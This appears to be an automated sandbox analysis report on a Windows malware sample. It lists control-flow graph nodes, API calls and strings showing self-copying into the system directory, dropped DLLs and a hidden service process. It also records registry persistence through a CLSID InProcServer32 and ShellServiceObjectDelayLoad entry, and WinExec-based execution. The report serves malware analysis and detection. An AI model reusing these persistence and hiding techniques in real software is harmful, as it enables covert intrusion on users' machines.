strcat 3069->3070 3071 4047bb strcat rand 3069->3071 3070->3071 3072 4047e6 rand sprintf 3071->3072 3073 404809 rand sprintf sprintf rand 3071->3073 3072->3073 3074 404859 rand sprintf 3073->3074 3075 40487c rand 3073->3075 3074->3075 3076 404894 strcat 3075->3076 3077 4048a7 rand 3075->3077 3076->3077 3078 4048b9 strcat 3077->3078 3079 4048cc rand 3077->3079 3078->3079 3080 4048f1 sprintf rand 3079->3080 3081 4048de strcat 3079->3081 3082 404926 strcat 3080->3082 3083 404939 rand 3080->3083 3081->3080 3082->3083 3084 40494b strcat 3083->3084 3085 40495e rand 3083->3085 3084->3085 3086 404976 rand sprintf 3085->3086 3087 404999 3085->3087 3086->3087 3090 4049a3 3087->3090 3114 404b12 3087->3114 3088 4043bf 2 API calls 3088->3114 3089 404b07 3091 404c87 strcat rand 3089->3091 3090->3089 3094 404a4b sprintf rand 3090->3094 3095 4049d9 sprintf 3090->3095 3092 404cac strcat 3091->3092 3093 404cbf rand 3091->3093 3092->3093 3096 404cd1 strcat 3093->3096 3097 404ce4 rand 3093->3097 3098 404a82 strcat 3094->3098 3099 404a95 rand 3094->3099 3095->3090 3096->3097 3101 404cf6 strcat 3097->3101 3102 404d09 strcat rand 3097->3102 3098->3099 3103 404aa7 strcat 3099->3103 3104 404aba rand 3099->3104 3100 404b47 sprintf 3100->3114 3101->3102 3105 404d34 rand sprintf 3102->3105 3106 404d57 rand 3102->3106 3103->3104 3104->3090 3107 404acc strcat 3104->3107 3105->3106 3108 404d69 strcat 3106->3108 3109 404d7c rand 3106->3109 3107->3090 3108->3109 3110 404da1 rand 3109->3110 3111 404d8e strcat 3109->3111 3112 404db9 strcat 3110->3112 3113 404dcc rand 3110->3113 3111->3110 3112->3113 3115 404e01 strcat rand 3113->3115 3116 404dde rand sprintf 3113->3116 3114->3088 3114->3091 3114->3100 3141 40447a lstrlenA LocalAlloc 3114->3141 3118 404e2c strcat 3115->3118 3119 404e3f strcat rand 3115->3119 3116->3115 3118->3119 3121 404e64 strcat 3119->3121 3122 404e77 strcat rand 3119->3122 3121->3122 3125 404ea2 strcat 3122->3125 3126 404eb5 sprintf rand 3122->3126 3123 404c02 rand 3127 404c14 
strcat 3123->3127 3128 404c27 rand 3123->3128 3124 404bef strcat 3124->3123 3125->3126 3129 404ee3 strcat 3126->3129 3130 404ef6 strcat rand 3126->3130 3127->3128 3131 404c39 strcat 3128->3131 3132 404c4c LocalFree 3128->3132 3129->3130 3133 404f27 strcat 3130->3133 3134 404f3a rand sprintf rand 3130->3134 3131->3132 3132->3114 3133->3134 3135 404f77 strcat 3134->3135 3136 404f8a strcat rand 3134->3136 3135->3136 3137 404fb5 strcat 3136->3137 3138 404fc8 rand 3136->3138 3137->3138 3139 404fda rand sprintf 3138->3139 3140 404ffd 7 API calls 3138->3140 3139->3140 3140->3052 3142 4044b6 3141->3142 3143 4044d9 sprintf 3142->3143 3144 40452a sprintf rand 3142->3144 3143->3142 3144->3123 3144->3124 3145 401b33 3148 401aa4 3145->3148 3146 401b13 3147 401ae6 sprintf 3150 40129c 3147->3150 3148->3146 3148->3147 3151 4012a9 CreateFileA 3150->3151 3152 4079e4 3150->3152 3153 4012db ReadFile CloseHandle 3151->3153 3154 4012d7 3151->3154 3152->3151 3153->3154 3154->3146 3155 4036b3 CreateFileA 3156 4036e7 SetFilePointer 3155->3156 3157 4036e3 3155->3157 3158 403701 3156->3158 3158->3158 3159 403708 WriteFile WriteFile CloseHandle 3158->3159 3159->3157 2765 406ff6 2766 4071a4 2765->2766 2767 40701f 2765->2767 2770 40717e 2766->2770 2771 4071be DestroyWindow 2766->2771 2768 407021 2767->2768 2769 40702f 2767->2769 2772 407184 2768->2772 2773 40702a 2768->2773 2774 407289 GetWindowTextA 2769->2774 2775 40703a 2769->2775 2771->2770 2772->2770 2781 407198 PostQuitMessage 2772->2781 2776 4077cc DefWindowProcA 2773->2776 2779 4072c9 GetWindowTextA 2774->2779 2780 4072a9 MessageBoxA SetFocus 2774->2780 2777 407041 2775->2777 2778 40705c 2775->2778 2776->2770 2777->2773 2777->2776 2785 4071cb 2777->2785 2784 407149 2778->2784 2821 405ffa 2778->2821 2782 407322 2779->2782 2783 407302 MessageBoxA SetFocus 2779->2783 2780->2770 2781->2770 2789 407337 MessageBoxA SetFocus 2782->2789 2798 407357 2782->2798 2783->2770 2784->2770 2828 406075 2784->2828 2785->2770 2791 407224 SetTextColor 
2785->2791 2793 407233 SetTextColor 2785->2793 2789->2770 2790 405ffa 3 API calls 2792 40709b GetWindowRect 2790->2792 2794 40723d SetBkColor CreateBrushIndirect 2791->2794 2792->2784 2795 4070be GetWindowRect 2792->2795 2793->2794 2794->2770 2795->2784 2797 4070d4 2795->2797 2796 4073a7 sprintf GetWindowTextA 2800 40740f sprintf GetWindowTextA 2796->2800 2801 4073ef MessageBoxA SetFocus 2796->2801 2797->2784 2802 407112 MoveWindow 2797->2802 2798->2796 2799 407376 MessageBoxA SetFocus 2798->2799 2799->2770 2803 407477 sprintf GetWindowTextA 2800->2803 2804 407457 MessageBoxA SetFocus 2800->2804 2801->2770 2802->2784 2805 4074d9 2803->2805 2806 4074b9 MessageBoxA SetFocus 2803->2806 2804->2770 2807 4074ee MessageBoxA SetFocus 2805->2807 2809 40750e 2805->2809 2806->2770 2807->2770 2808 40755e sprintf GetWindowTextA 2811 4075a6 MessageBoxA SetFocus 2808->2811 2812 4075c6 2808->2812 2809->2808 2810 40752d MessageBoxA SetFocus 2809->2810 2810->2770 2811->2770 2813 407627 sprintf CreateFileA SetFilePointer 2812->2813 2815 4075e5 MessageBoxA SetFocus 2812->2815 2814 40768e 2813->2814 2814->2814 2816 407695 WriteFile WriteFile 2814->2816 2815->2770 2817 4076db 2816->2817 2817->2817 2818 4076e2 6 API calls 2817->2818 2819 40776e 2818->2819 2819->2819 2820 407775 WriteFile WriteFile CloseHandle ShowWindow 2819->2820 2820->2770 2822 4079e4 2821->2822 2823 406007 GetWindow 2822->2823 2824 406020 2823->2824 2825 406024 2824->2825 2826 406028 GetClassNameA 2824->2826 2827 40605f GetWindow 2824->2827 2825->2790 2826->2824 2827->2824 2829 405ffa 3 API calls 2828->2829 2830 406096 2829->2830 2831 405ffa 3 API calls 2830->2831 2832 4060a3 10 API calls 2831->2832 2833 406224 SendMessageA 2832->2833 2834 40623a SendMessageA 2832->2834 2835 40624e CreateWindowExA CreateWindowExA 2833->2835 2834->2835 2836 406333 2835->2836 2837 4062cb sprintf SendMessageA sprintf SendMessageA 2836->2837 2838 40633c 34 API calls 2836->2838 2837->2836 2838->2770 2975 401219 2976 40121f __GetMainArgs 
2975->2976 2977 407980 173 API calls 2976->2977 2978 401284 exit 2977->2978 2979 40109a 2987 40109b 2979->2987 2980 40117f 2981 40118e signal 2980->2981 2982 4011a8 signal 2981->2982 2983 4011c9 2981->2983 2982->2983 2984 40117b 2982->2984 2983->2984 2985 4011ce signal raise 2983->2985 2985->2984 2987->2980 2987->2981 2987->2984 2988 40107a RtlUnwind 2987->2988 2988->2987 2839 40237b 2840 402333 _sleep 2839->2840 2841 402355 2839->2841 2842 401b9f 23 API calls 2840->2842 2843 40234c 2842->2843 2843->2840 2843->2841 2989 40109b 2990 40117f 2989->2990 2997 4010c3 2989->2997 2991 40118e signal 2990->2991 2992 4011a8 signal 2991->2992 2993 4011c9 2991->2993 2992->2993 2994 40117b 2992->2994 2993->2994 2995 4011ce signal raise 2993->2995 2995->2994 2997->2991 2997->2994 2998 40107a RtlUnwind 2997->2998 2998->2997 2999 40129b 3000 4079e4 2999->3000 3001 4012a9 CreateFileA 3000->3001 3002 4012db ReadFile CloseHandle 3001->3002 3003 4012d7 3001->3003 3002->3003 2715 40365e 2716 403664 GetFileSize LocalAlloc 2715->2716 2717 403684 ReadFile CloseHandle 2716->2717 2719 4036ae 2717->2719 2534 40121f __GetMainArgs 2537 407980 GetCommandLineA 2534->2537 2538 407991 strchr 2537->2538 2539 4079a6 2537->2539 2538->2539 2540 4079cf GetModuleHandleA 2538->2540 2539->2540 2543 406c29 OpenMutexA 2540->2543 2544 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2543->2544 2545 406c5f CloseHandle exit 2543->2545 2546 406cd6 2544->2546 2545->2544 2547 406ce4 rand 2546->2547 2548 406e07 9 API calls 2546->2548 2550 406d5f 2547->2550 2590 402e06 2548->2590 2552 406d69 rand 2550->2552 2553 406d2f rand 2550->2553 2556 406d8a sprintf CopyFileA 2552->2556 2557 406d7c 2552->2557 2553->2550 2554 406f65 2606 4023a7 CreateThread CloseHandle 2554->2606 2555 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2555->2554 2567 403ce9 rand 2556->2567 2557->2556 2561 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2563 406fdc GetMessageA 2561->2563 
2658 4068b0 2561->2658 2676 40682b 2561->2676 2565 406fc4 TranslateMessage DispatchMessageA 2563->2565 2566 401284 exit 2563->2566 2565->2563 2568 403d2e 2567->2568 2569 403d27 2567->2569 2607 403619 CreateFileA 2568->2607 2578 403f68 rand 2569->2578 2572 403d47 memcpy memset 2574 403da1 rand rand rand rand memcpy 2572->2574 2575 403e64 2574->2575 2613 403bbe 2575->2613 2579 404002 2578->2579 2580 403fd4 rand 2579->2580 2581 404009 rand 2579->2581 2580->2579 2582 40402a 6 API calls 2581->2582 2583 40401c 2581->2583 2618 404148 RegCreateKeyExA 2582->2618 2583->2582 2585 4040f5 2586 404148 3 API calls 2585->2586 2587 404125 2586->2587 2588 404148 3 API calls 2587->2588 2589 40413a WinExec ExitProcess 2588->2589 2591 402e13 2590->2591 2621 402822 6 API calls 2591->2621 2593 402e1b GetVersion 2594 402e2e 2593->2594 2595 402e79 LoadLibraryA GetProcAddress 2594->2595 2605 402ef6 2594->2605 2595->2594 2596 4033ce GetVersion 2596->2554 2596->2555 2598 4030e5 GetModuleHandleA 2598->2605 2599 40314c VirtualQuery 2600 4031b1 IsBadWritePtr 2599->2600 2599->2605 2600->2605 2601 402f98 GlobalMemoryStatus 2601->2605 2602 402f6f IsBadReadPtr 2602->2605 2604 403059 CloseHandle 2604->2605 2605->2596 2605->2598 2605->2599 2605->2601 2605->2602 2605->2604 2622 40289a 2605->2622 2626 402cd7 2605->2626 2606->2561 2635 4022ee 2606->2635 2608 403664 GetFileSize LocalAlloc 2607->2608 2610 40364e 2607->2610 2609 403684 ReadFile CloseHandle 2608->2609 2612 4036ae 2609->2612 2610->2608 2610->2612 2612->2569 2612->2572 2614 403bfd 2613->2614 2615 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2614->2615 2616 403c20 rand 2614->2616 2617 403c80 memset memcpy memcpy 2614->2617 2615->2569 2616->2614 2617->2614 2619 404193 2618->2619 2619->2619 2620 40419a RegSetValueExA RegCloseKey 2619->2620 2620->2585 2621->2593 2623 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2622->2623 2625 4029cd 2623->2625 2625->2605 2627 402ceb 2626->2627 2629 402d13 2627->2629 2630 402a72 
2627->2630 2629->2605 2633 402a89 2630->2633 2631 402cd2 2631->2629 2632 402b2a GetModuleHandleA GetProcAddress 2632->2633 2633->2631 2633->2632 2634 402cad GetCurrentProcessId 2633->2634 2634->2633 2636 402333 _sleep 2635->2636 2640 401b9f 2636->2640 2656 4079e4 2640->2656 2657 4079e5 2656->2657 2657->2657 2660 4068c7 2658->2660 2661 406c0c _sleep 2660->2661 2662 403619 5 API calls 2660->2662 2664 406c01 LocalFree 2660->2664 2665 406941 sscanf 2660->2665 2667 406a84 atoi 2660->2667 2668 4069a4 sprintf sprintf 2660->2668 2669 4069db GetWindowsDirectoryA sprintf strcat 2660->2669 2672 406add lstrlenA 2660->2672 2673 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2660->2673 2674 406b9b lstrlenA 2660->2674 2675 406bbe CreateThread CloseHandle 2660->2675 2680 405f5b lstrlenA lstrlenA LocalAlloc 2660->2680 2685 4043bf 2660->2685 2661->2660 2662->2660 2664->2661 2665->2660 2666 406972 rand 2665->2666 2666->2660 2667->2660 2671 406aad sprintf 2667->2671 2670 406a27 DeleteFileA sprintf WinExec 2668->2670 2669->2670 2670->2660 2671->2660 2672->2660 2673->2660 2674->2660 2675->2660 2677 40683b 2676->2677 2693 406753 CreateFileA 2677->2693 2691 407a04 2680->2691 2682 405f9b lstrlenA 2692 407a04 2682->2692 2684 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2684->2660 2686 4043dc 2685->2686 2687 4043e2 memcpy 2686->2687 2689 40441a 2686->2689 2690 40442f 2687->2690 2688 404441 lstrlenA 2688->2690 2689->2688 2689->2690 2690->2660 2691->2682 2692->2684 2694 40678f GetFileSize CloseHandle 2693->2694 2700 40681a _sleep 2693->2700 2701 4013cc RegOpenKeyExA 2694->2701 2700->2677 2702 4013fa 2701->2702 2703 4013fe RegQueryValueExA RegCloseKey 2701->2703 2702->2700 2704 4054d7 6 API calls 2702->2704 2703->2702 2705 405586 2704->2705 2706 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2705->2706 2707 40560e 2706->2707 2707->2700 2708 401348 RegCreateKeyExA 2707->2708 2709 40138a RegSetValueExA RegCloseKey 2708->2709 2710 
401386 2708->2710 2709->2710 2710->2700

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Oeanchcn,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Oeanchcn,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Oeanchcn,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Oeanchcn,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Oeanchcn$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-2442642010
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
